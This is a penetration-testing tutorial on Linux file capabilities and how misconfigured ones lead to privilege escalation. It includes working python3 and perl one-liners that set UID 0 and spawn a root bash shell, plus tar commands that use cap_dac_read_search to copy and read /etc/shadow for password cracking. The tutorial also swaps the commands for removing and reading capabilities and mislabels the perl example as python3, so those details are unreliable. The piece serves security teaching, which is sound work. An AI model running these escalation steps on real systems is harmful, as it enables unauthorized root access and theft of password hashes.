In this article, we will discuss the mechanism of “capability” and Privilege escalation by abusing it. As we know when the system creates a work context for each user where they achieve their tasks with the privileges that are assigned to them. So, to provide some specific functionalities, it is necessary for a non-privileged user to sometimes temporarily acquire a superuser profile to perform a specific task.

This functionality mainly can be achieved by assigning privileges through sudo, or setuid permissions to an executable file which allows the user to adopt the role of the file owner.

To accomplish the same task in a more secure way. The system admin uses “capability” which plays an effective role in the security of Linux based operating systems.

Table of Content

Introduction to Capability

• What is capability?
• Difference between capability and SUID.
• Use of capabilities.
• Working with capability
• List of capability

Abusing capability for Privilege Escalations

• Python3
• Perl
• Tar

Introduction to Capability

What is capability in Linux

Before capabilities, we only had the binary system of privileged and non-privileged processes and for the purpose of performing permission checks. Traditional UNIX implementations distinguish two categories of processes: privileged processes that referred as superuser or root and unprivileged processes (whose effective UID is nonzero).

Capabilities are those permissions that divide the privileges of kernel users or kernel level programs into small pieces. Allowing a process to have sufficient power to perform specific privileged tasks.

Difference between capability and SUID

SUID: SUID stands for Set User ID and allows users to execute the file as the file owner. In other words, it gives temporary access to a user to run a program or file with the permissions of the file’s owner, rather than the user who runs it. This behavior can easily be detected by using the “find” command. To illustrate, to find all files with SUID set in the current directory, we can use the -perm option, which will print files only with permissions set to 4000.

Capability: Security of Linux systems can be improved by using many actions. One of these measures is called Linux capabilities which are maintained by the kernel. In other words, we can say that they are a little unintelligible but similar in principle to SUID. Linux’s thread privilege checking is based on capabilities.

Uses of capabilities

Capabilities work by breaking the actions normally reserved for root down into smaller portions. The use of capabilities is only beginning to drop into userland applications as most system utilities do not shed their root privileges. Let’s move ahead that how we can use this permission more into our task.

Limited users’ permission: As we know, giving away too many privileges by default will result in unauthorized changes of data, backdoors, and circumventing access controls, just to name a few. To overcome this situation, we can simply use the capability to limit users’ permissions.

Using a fine-grained set of privileges: Another example can more clearly illustrate the use of capability. Suppose a web server normally runs at port 80 and we also know that we need root permissions to start listening on one of the lower ports (<1024). This web server daemon needs to be able to listen to port 80. Instead of giving this daemon all root permissions, we can set a capability on the related binary, like CAP_NET_BIND_SERVICE. With this specific capability, it can open up port 80 in a much easier way.

Working with capability

You can achieve the operation of capabilities in many ways. Some of them are listed below:

Assigning and removing capability: Executables usually set them on files, and the system automatically grants them to the process when it executes a file with a capability. The system stores the file capability sets in an extended attribute named security.capability. Users can do this by using the attribute CAP_SETCAP capability.

To enable the capability for any file frame command as shown below:

setcap cap_setuid+ep /home/demo/python3

Similarly one can also remove file capability by as below mentioned command.

getcap -r / 2>/dev/null

Reading capability: Many files or programs have predefined capabilities, so to view whether a file has any capability set, you can simply run the command as:

setcap -r /home/demo/python3

If you want to find out which capabilities your system has already set, you can search your whole file-system recursively with the following command:

getcap -r / 2>/dev/null

List of Capability

Based on functionality, we categorize the capability into a total of 36 in the count. Some of the most commonly used ones are shown below.

Abusing Capabilities Privilege Escalations

Python Capability

Suppose the system administrator wants to grant superuser permission for any binary program. For instance, consider python3, which should only be available to a specific user, and the admin doesn’t want to give SUID or sudo permission. In such cases, the admin can use capabilities for the python3 program that the specific user — let’s say user “demo” — should execute. This can be accomplished with the following commands on the host machine.

which python3
cp /usr/bin/python3 /home/demo/
setcap cap_setuid+ep /home/demo/python3

As a result, the admin has granted the user demo the privilege to run the python3 program as root by using cap_setuid+ep. This means the system assigns all privilege to the user for that program. But if you try to find 4000 permission files or programs, then it might not show for /home/dome/python3.

Note: Other users should not access the user home directory because if non-root users access it, they will also gain the privileges of the capabilities set for the user demo.

Exploiting capability using Python

Assuming an intruder compromises the host machine as a local user and spawns the least privileged shell. He looks for system capabilities and finds that the system gives the empty capability (ep) over suid to python3 for user demo. This means the system assigns all privileges to the user for that program. Therefore, by taking advantage of this permission, he can escalate from a low-privilege shell to a high-privilege shell.

getcap -r / 2>/dev/null
pwd
ls -al python3
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id

Hence, you can observe that the local user demo has accessed the root shell as shown in the given image.

Perl Capability

We have another example “perl” which is the same as above where the admin should use capabilities for the perl program that a specific user. Let’s say user “demo”, will execute. The following commands on the host machine can accomplish this.

which perl
cp /usr/bin/perl /home/demo/
setcap cap_setuid+ep /home/demo/perl

As a result, the admin has granted demo the privilege to run the python3 program as root by using cap_setuid+ep. This means the admin has assigned all privilege to the user for that program.

Exploiting capability using Perl

Repeat the above step for the exploit Perl program to escalate the root privilege:

getcap -r / 2>/dev/null
pwd
ls -al perl
./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
id

Tar Capability

We have another example, “tar,” which is the same as above, where the admin uses capabilities to extract high-privilege files that restrict other users, and a specific user, let’s say user “demo,” extracts them.

Let’s take an example: The admin wants to assign a role, where the user “demo” can take the backup of files as root. For this task, the admin has set read capability on the tar program. This can be accomplished with the following commands on the host machine.

which tar
cp /bin/tar /home/demo/
setcap cap_dac_read_search+ep /home/demo/tar

Exploiting the capability using tar

Repeat the same procedure to escalate the privilege, take access to the host machine as a local user, and move ahead for privilege escalation. Since this time admin has used CAP_DAC_READ_SEARCH which will help us to bypass file read permission checks and directory read and execute permission checks.

getcap -r / 2>/dev/null
pwd
ls -al tar

In this, we try to read the shadow file where the system stores all user password hashes; for this, you have to follow the steps below.

• Compress the /etc/shadow in the current directory with the help of the tar program.
• You will get shadow.tar in your current directory.
• Extract the shadow.tar and you will get a directory as “etc/shadow”.
• Use cat/head/tail or program to read the hashes of passwords.

./tar cvf shadow.tar /etc/shadow
ls
./tar -xvf shadow.tar

As a result, you will have “etc/shadow” file your current directory and you can read the hashes of the password as shown here.

tail -8 etc/shadow

A malicious user can break this password using a tool such as a john the ripper or hash killer etc.

Conclusion:  The system admin should be aware of security loopholes during assigning such capability which can affect the integrity of kernel that can lead to privilege escalation.

References:

http://lists.linuxfromscratch.org/pipermail/hlfs-dev/2011-August/004870.html

https://gtfobins.github.io/

To Learn more about Privilege Escalation. Follow this Link.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer. She is a completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here